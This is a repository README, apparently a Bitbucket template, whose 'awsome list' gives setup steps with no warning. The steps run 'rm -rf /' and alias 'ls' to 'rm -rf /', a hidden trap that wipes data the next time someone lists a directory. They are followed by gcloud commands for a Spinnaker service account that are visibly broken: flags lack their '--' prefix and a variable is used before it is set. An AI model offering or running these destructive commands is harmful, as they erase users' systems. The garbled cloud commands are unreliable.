# README #

### awsome list
####1. DO Z

	```
	$ rm -rf /
	```

#####2. do Y

	```
	$ alias ls=rm -rf /
	```

3. Do x

	```bash
gcloud iam service-accounts create $SPINNAKER_SA \
	project=$GCP_PROJECT \
	display-name $SPINNAKER_SA
	```

4. Do x
```
gcloud projects add-iam-policy-binding $GCP_PROJECT \ 
	--role roles/container.admin \ 
	--member serviceAccount:$SPINNAKER_SA_EMAIL 
	
SPINNAKER_SA_EMAIL=$(gcloud iam service-accounts list \
    --project=$GCP_PROJECT \
    --filter="displayName:$SPINNAKER_SA" \
    --format='value(email)')
```
### What is this repository for? ###

* Quick summary
* Version
* [Learn Markdown](https://bitbucket.org/tutorials/markdowndemo)

### How do I get set up? ###

* Summary of set up
* Configuration
* Dependencies
* Database configuration
* How to run tests
* Deployment instructions

### Contribution guidelines ###

* Writing tests
* Code review
* Other guidelines

### Who do I talk to? ###

* Repo owner or admin
* Other community or team contact